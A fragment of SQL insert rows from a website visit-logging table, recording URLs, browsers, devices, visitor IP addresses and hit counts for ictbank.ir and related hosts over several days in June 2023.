(33991,'2023-06-08','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','101.36.119.7','000',0,29,0),
(33992,'2023-06-08','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','208.97.158.174','000',0,4,0),
(33993,'2023-06-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(33994,'2023-06-08','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','188.169.239.225','000',0,1,0),
(33995,'2023-06-08','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.198.117.210','000',0,1,0),
(33996,'2023-06-08','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.177.118','000',0,2,0),
(33997,'2023-06-08','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','5.180.185.136','000',0,1,0),
(33998,'2023-06-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,4,0),
(33999,'2023-06-08','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,1,0),
(34000,'2023-06-08','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','207.244.255.190','000',0,1,0),
(34001,'2023-06-08','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','5.188.87.37','000',0,1,0),
(34002,'2023-06-08','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','183.91.11.200','000',0,1,0),
(34003,'2023-06-08','https://design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','45.156.129.22','000',0,2,0),
(34004,'2023-06-08','https://ictbank.ir/golrang_payment/major_buyers/sw.js','Chrome','Windows','114.0.0.0','desktop','Unknown','','85.185.49.169','000',0,53,0),
(34005,'2023-06-08','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.46','000',0,1,0),
(34006,'2023-06-08','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','51.83.238.159','000',0,1,0),
(34007,'2023-06-08','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','180.149.125.173','000',0,1,0),
(34008,'2023-06-08','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(34009,'2023-06-08','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.250.69','000',0,9,0),
(34010,'2023-06-08','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,2,0),
(34011,'2023-06-08','https://ictbank.ir/blog/connection-encryption-in-oracle-database/','Firefox','Windows','3.0.0','desktop','Unknown','','174.95.104.161','000',0,1,0),
(34012,'2023-06-08','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','88.152.26.37','000',0,127,0),
(34013,'2023-06-08','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','46.60.84.0','000',0,1,0),
(34014,'2023-06-08','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.138','000',0,2,0),
(34015,'2023-06-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(34016,'2023-06-09','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','95.216.77.85','000',0,4,0),
(34017,'2023-06-09','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(34018,'2023-06-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(34019,'2023-06-09','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','146.59.52.85','000',0,1,0),
(34020,'2023-06-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(34021,'2023-06-09','https://m.ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.133.48','000',0,1,0),
(34022,'2023-06-09','https://m.design-arena.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.145.94','000',0,1,0),
(34023,'2023-06-09','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','45.12.253.198','000',0,1,0),
(34024,'2023-06-09','https://ictbank.ir/blog','Chrome','OS X','11.0.0.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(34025,'2023-06-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,4,0),
(34026,'2023-06-09','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.121','000',0,1,0),
(34027,'2023-06-09','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.130.109.202','000',0,1,0),
(34028,'2023-06-09','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.188','000',0,3,0),
(34029,'2023-06-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(34030,'2023-06-09','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.162.252.226','000',0,1,0),
(34031,'2023-06-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,6,0),
(34032,'2023-06-09','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.185.82.142','000',0,1,0),
(34033,'2023-06-09','https://design-arena.ir/blog','Yandex Browser','Android','23.0.0.0.0','mobile:smart','Reno 5 Lite','','93.159.230.89','000',0,2,0),
(34034,'2023-06-09','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','104.168.135.211','000',0,1,0),
(34035,'2023-06-09','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','167.172.240.46','000',0,2,0),
(34036,'2023-06-09','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','213.52.130.88','000',0,2,0),
(34037,'2023-06-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(34038,'2023-06-09','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','18.246.33.30','000',0,2,0),
(34039,'2023-06-09','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.6','000',0,1,0),
(34040,'2023-06-09','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(34041,'2023-06-09','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(34042,'2023-06-09','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Vivaldi','OS X','5.0.0.0','desktop','Macintosh','','172.86.123.170','000',0,2,0),
(34043,'2023-06-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,4,0),
(34044,'2023-06-09','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(34045,'2023-06-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(34046,'2023-06-09','https://ictbank.ir/blog','Chromium','Ubuntu','12.0.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(34047,'2023-06-09','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','141.98.6.73','000',0,2,0),
(34048,'2023-06-09','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','66.240.192.138','000',0,1,0),
(34049,'2023-06-09','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,1,0),
(34050,'2023-06-10','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','192.64.4.19','000',0,10,0),
(34051,'2023-06-10','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,8,0),
(34052,'2023-06-10','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.108','000',0,2,0),
(34053,'2023-06-10','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(34054,'2023-06-10','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','198.251.74.111','000',0,2,0),
(34055,'2023-06-10','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.50','000',0,3,0),
(34056,'2023-06-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,4,0),
(34057,'2023-06-10','https://ictbank.ir/blog','Chrome','Linux','5.0.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(34058,'2023-06-10','http://www.google.com','Firefox','Windows','99.0','desktop','Unknown','','45.81.39.203','000',0,2,0),
(34059,'2023-06-10','https://ictbank.ir/blog','Chrome','Linux','113.0.0.0','desktop','Unknown','','44.227.127.2','000',0,5,0),
(34060,'2023-06-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,6,0),
(34061,'2023-06-10','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','178.128.82.148','000',0,1,0),
(34062,'2023-06-10','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','198.12.253.60','000',0,1,0),
(34063,'2023-06-10','https://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.126','000',0,3,0),
(34064,'2023-06-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(34065,'2023-06-10','https://ns2.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.76','000',0,2,0),
(34066,'2023-06-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(34067,'2023-06-10','https://ns1.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.148','000',0,2,0),
(34068,'2023-06-10','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.88.114.189','000',0,1,0),
(34069,'2023-06-10','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.174.194','000',0,80,0),
(34070,'2023-06-10','https://ictbank.ir/blog','Chrome','Linux','81.0.0.0','desktop','Unknown','','80.94.92.24','000',0,2,0),
(34071,'2023-06-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(34072,'2023-06-10','https://ictbank.ir/hooman/admin/index.php?pid=goods','Chrome','Windows','114.0.0.0','desktop','Unknown','','78.39.181.103','000',0,14,0),
(34073,'2023-06-10','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(34074,'2023-06-10','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.188','000',0,2,0),
(34075,'2023-06-10','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.70','000',0,2,0),
(34076,'2023-06-10','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','50.87.248.17','000',0,1,0),
(34077,'2023-06-10','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.219.216.230','000',0,1,0),
(34078,'2023-06-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(34079,'2023-06-10','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','45.140.91.179','000',0,1,0),
(34080,'2023-06-10','https://ictbank.ir/blog','Opera','Windows','11.0','desktop','Unknown','','45.140.90.74','000',0,1,0),
(34081,'2023-06-10','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','165.231.181.130','000',0,3,0),
(34082,'2023-06-10','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','54.227.79.93','000',0,1,0),
(34083,'2023-06-10','https://ictbank.ir/blog','Chrome','Android','88.0.0.0','mobile:smart','Pixel 2','','149.14.101.186','000',0,1,0),
(34084,'2023-06-10','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,1,0),
(34085,'2023-06-10','https://ictbank.ir/blog','Chrome','Android','114.0.0.0','mobile:smart','Nexus 5X','','64.233.172.229','000',0,1,0),
(34086,'2023-06-10','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','54.196.10.18','000',0,1,0),
(34087,'2023-06-10','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','93.119.227.91','000',0,1,0),
(34088,'2023-06-10','https://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','103.0.0.0','desktop','Unknown','','37.139.53.17','000',0,4,0),
(34089,'2023-06-10','https://ictbank.ir/blog','Chrome','iOS','99.0.0.0','mobile:smart','iPhone','','51.75.141.254','000',0,1,0),
(34090,'2023-06-10','https://ictbank.ir/blog','Chrome','Android','113.0.0.0','mobile:smart','Unknown','','198.7.56.226','000',0,1,0),
(34091,'2023-06-10','https://ictbank.ir/blog','Chrome','OS X','90.0.0.0','desktop','Macintosh','','138.199.22.182','000',0,1,0),
(34092,'2023-06-10','https://ictbank.ir/blog','Firefox Mobile','Android','113.0','mobile:smart','Unknown','','197.242.159.110','000',0,1,0),
(34093,'2023-06-10','https://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Galaxy S III','','69.4.87.74','000',0,1,0),
(34094,'2023-06-10','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.143','000',0,1,0),
(34095,'2023-06-10','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','157.230.160.205','000',0,3,0),
(34096,'2023-06-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(34097,'2023-06-10','https://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(34098,'2023-06-11','http://ictbank.ir','Chrome','Windows','56.0.0.0','desktop','Unknown','','185.220.101.39','000',0,1,0),
(34099,'2023-06-11','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(34100,'2023-06-11','https://ictbank.ir/blog','Chrome','Android','112.0.0.0','mobile:smart','Pixel 6','','133.242.174.119','000',0,2,0),
(34101,'2023-06-11','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(34102,'2023-06-11','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.80','000',0,1,0),
(34103,'2023-06-11','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','137.184.73.235','000',0,3,0),
(34104,'2023-06-11','https://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(34105,'2023-06-11','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,4,0),
(34106,'2023-06-11','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','71.6.165.200','000',0,2,0),
(34107,'2023-06-11','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.251.13.32','000',0,1,0),
(34108,'2023-06-11','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.94.159','000',0,1,0),
(34109,'2023-06-11','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.254.76.138','000',0,3,0),
(34110,'2023-06-11','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.251.11.3','000',0,1,0),
(34111,'2023-06-11','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.6.178','000',0,1,0),
(34112,'2023-06-11','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,6,0),
(34113,'2023-06-11','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','185.220.103.120','000',0,1,0),
(34114,'2023-06-11','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(34115,'2023-06-11','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.48','000',0,3,0),
(34116,'2023-06-11','https://ictbank.ir/blog','Chrome','Android','112.0.0.0','mobile:smart','Pixel 6','','171.244.43.14','000',0,2,0),
(34117,'2023-06-11','https://ictbank.ir/omidi/wp-admin/setup-config.php','Chrome','OS X','114.0.0.0','desktop','Macintosh','','89.37.154.135','000',0,19,0),
(34118,'2023-06-11','https://ictbank.ir/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.89.195.210','000',0,1,0),
(34119,'2023-06-11','https://ictbank.ir/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.78.6','000',0,1,0),
(34120,'2023-06-11','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.219.56.243','000',0,1,0),
(34121,'2023-06-11','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,6,0),
(34122,'2023-06-11','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.177.111','000',0,74,0),
(34123,'2023-06-11','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','192.210.128.231','000',0,2,0),
(34124,'2023-06-11','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','192.171.81.234','000',0,2,0),
(34125,'2023-06-11','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','154.202.95.49','000',0,2,0),
(34126,'2023-06-11','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','23.229.90.90','000',0,2,0),
(34127,'2023-06-11','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','216.213.28.162','000',0,2,0),
(34128,'2023-06-11','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','142.147.108.10','000',0,2,0),
(34129,'2023-06-11','https://ictbank.ir/blog','Chrome','Windows','86.0.0.0','desktop','Unknown','','20.169.168.224','000',0,4,0),
(34130,'2023-06-11','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(34131,'2023-06-11','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.188','000',0,2,0),
(34132,'2023-06-11','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','101.68.211.2','000',0,2,0),
(34133,'2023-06-11','https://45.92.94.221/blog','Firefox','Windows','79.0','desktop','Unknown','','164.52.0.92','000',0,1,0),
(34134,'2023-06-11','https://ictbank.ir/hooman/admin/index.php?pid=students&func=add','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.132.193','000',0,24,0),
(34135,'2023-06-11','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','69.167.12.22','000',0,10,0),
(34136,'2023-06-11','https://ictbank.ir/blog','Firefox','Windows','58.0','desktop','Unknown','','69.4.89.106','000',0,1,0),
(34137,'2023-06-11','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','172.104.81.115','000',0,1,0),
(34138,'2023-06-11','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','185.86.166.90','000',0,1,0),
(34139,'2023-06-11','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(34140,'2023-06-11','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','5.188.87.37','000',0,1,0),
(34141,'2023-06-11','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','157.230.160.205','000',0,2,0),
(34142,'2023-06-11','https://ictbank.ir/blog','Chrome','Android','59.0.0.0','mobile:smart','Galaxy S7','','93.119.227.19','000',0,1,0),
(34143,'2023-06-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','43.130.122.76','000',0,3,0),
(34144,'2023-06-11','https://www.sourceweb.claims','Unknown','Unknown','Unknown','bot','Unknown','','3.120.32.24','000',0,1,0),
(34145,'2023-06-11','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(34146,'2023-06-12','http://design-arena.ir','Chrome','Windows','55.0.0.0','desktop','Unknown','','144.217.86.109','000',0,1,0),
(34147,'2023-06-12','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.181.45','000',0,3,0),
(34148,'2023-06-12','https://ictbank.ir/blog','Chrome','OS X','114.0.0.0','desktop','Macintosh','','156.251.248.93','000',0,1,0),
(34149,'2023-06-12','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','15.204.182.106','000',0,2,0),
(34150,'2023-06-12','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,8,0),
(34151,'2023-06-12','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','193.201.8.40','000',0,1,0),
(34152,'2023-06-12','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(34153,'2023-06-12','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,8,0),
(34154,'2023-06-12','https://ns10.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.148','000',0,2,0),
(34155,'2023-06-12','https://ictbank.ir/blog','Chrome','Windows','16.0.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(34156,'2023-06-12','https://ictbank.ir/blog','Firefox','Windows','31.0','desktop','Unknown','','85.209.40.53','000',0,1,0),
(34157,'2023-06-12','https://ictbank.ir/blog','Firefox','Windows','31.0','desktop','Unknown','','85.209.40.30','000',0,2,0),
(34158,'2023-06-12','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.91.205','000',0,1,0),
(34159,'2023-06-12','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.91.183','000',0,1,0),
(34160,'2023-06-12','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.91.196','000',0,1,0),
(34161,'2023-06-12','https://ictbank.ir/blog','Opera','Windows','84.0.0.0','desktop','Unknown','','93.158.91.189','000',0,1,0),
(34162,'2023-06-12','http://ictbank.ir','Chrome','Windows','80.0.0.0','desktop','Unknown','','23.129.64.215','000',0,1,0),
(34163,'2023-06-12','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(34164,'2023-06-12','https://ictbank.ir/blog','Chrome','Windows','111.0.0.0','desktop','Unknown','','37.205.61.30','000',0,1,0),
(34165,'2023-06-12','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,6,0),
(34166,'2023-06-12','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,1,0),
(34167,'2023-06-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','51.83.238.159','000',0,1,0),
(34168,'2023-06-12','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,4,0),
(34169,'2023-06-12','https://ictbank.ir/hooman/admin/','Chrome','Windows','114.0.0.0','desktop','Unknown','','151.238.16.180','000',0,92,0),
(34170,'2023-06-12','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.6','000',0,2,0),
(34171,'2023-06-12','https://ictbank.ir/blog','Edge','Windows','114.0.0.0','desktop','Unknown','','34.220.126.163','000',0,174,0),
(34172,'2023-06-12','https://ictbank.ir/blog','Safari','Windows','3.0.0','desktop','Unknown','','178.234.184.168','000',0,5,0),
(34173,'2023-06-12','https://ictbank.ir/blog','Chrome','OS X','11.0.0.0','desktop','Macintosh','','208.80.194.126','000',0,3,0),
(34174,'2023-06-12','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(34175,'2023-06-12','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.27.231','000',0,1,0),
(34176,'2023-06-12','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','107.150.103.49','000',0,9,0),
(34177,'2023-06-12','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,6,0),
(34178,'2023-06-12','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.164.138','000',0,88,0),
(34179,'2023-06-12','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Chrome','Windows','103.0.0.0','desktop','Unknown','','172.86.123.170','000',0,2,0),
(34180,'2023-06-12','https://www.google.com/','Firefox','Ubuntu','114.0','desktop','Unknown','','91.37.81.219','000',0,1,0),
(34181,'2023-06-12','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','188.166.94.189','000',0,1,0),
(34182,'2023-06-12','https://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Galaxy S21 FE','','104.28.214.162','000',0,2,0),
(34183,'2023-06-12','https://ictbank.ir/omidi/','Samsung Internet','Android','21.0','mobile:smart','Galaxy A12','','65.109.192.250','000',0,3,0),
(34184,'2023-06-12','https://ictbank.ir/omidi/','Samsung Internet','Android','21.0','mobile:smart','Galaxy A12','','5.117.78.24','000',0,3,0),
(34185,'2023-06-12','https://ictbank.ir/omidi/','Chrome','Android','106.0.0.0','mobile:smart','Galaxy Note 4','','103.214.44.175','000',0,7,0),
(34186,'2023-06-12','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(34187,'2023-06-12','https://45.92.94.221:443/blog','Chrome','OS X','92.0.0.0','desktop','Macintosh','','143.198.37.252','000',0,4,0),
(34188,'2023-06-12','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','130.255.166.69','000',0,2,0),
(34189,'2023-06-12','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','130.255.166.90','000',0,1,0),
(34190,'2023-06-12','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','130.255.166.80','000',0,1,0),
(34191,'2023-06-12','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,4,0),
(34192,'2023-06-12','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.214.48','000',0,2,0),
(34193,'2023-06-12','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(34194,'2023-06-12','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.7','000',0,1,0),
(34195,'2023-06-13','https://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','87.247.142.100','000',0,1,0),
(34196,'2023-06-13','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(34197,'2023-06-13','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(34198,'2023-06-13','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','188.165.22.2','000',0,8,0),
(34199,'2023-06-13','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Chrome','Windows','103.0.0.0','desktop','Unknown','','172.86.123.170','000',0,2,0),
(34200,'2023-06-13','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,4,0),
(34201,'2023-06-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,1,0),
(34202,'2023-06-13','https://ictbank.ir/blog','Chrome','Windows','94.0.0.0','desktop','Unknown','','45.148.120.113','000',0,14,0),
(34203,'2023-06-13','https://ictbank.ir/blog','Firefox','Windows','96.0','desktop','Unknown','','5.196.73.96','000',0,9,0),
(34204,'2023-06-13','https://ictbank.ir/blog','Chrome','Windows','73.0.0','desktop','Unknown','','118.194.250.80','000',0,17,0),
(34205,'2023-06-13','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.141','000',0,2,0),
(34206,'2023-06-13','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,4,0),
